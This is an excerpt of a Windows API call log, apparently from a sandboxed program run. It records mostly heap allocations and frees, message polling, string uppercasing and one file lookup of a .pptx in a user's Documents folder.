RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0215.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.909] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0215.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0215.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.915] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lmvGT20EAt7X97ts9.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d875f0, ftCreationTime.dwHighDateTime=0x1d5541d, ftLastAccessTime.dwLowDateTime=0x2e8b89d0, ftLastAccessTime.dwHighDateTime=0x1d54bdd, ftLastWriteTime.dwLowDateTime=0x2e8b89d0, ftLastWriteTime.dwHighDateTime=0x1d54bdd, nFileSizeHigh=0x0, nFileSizeLow=0x1688a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lmvGT20EAt7X97ts9.pptx", cAlternateFileName="LMVGT2~1.PPT")) returned 0x9e1bf8 [0215.915] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.916] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0215.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.917] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.917] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.917] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.917] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.918] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.918] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.918] 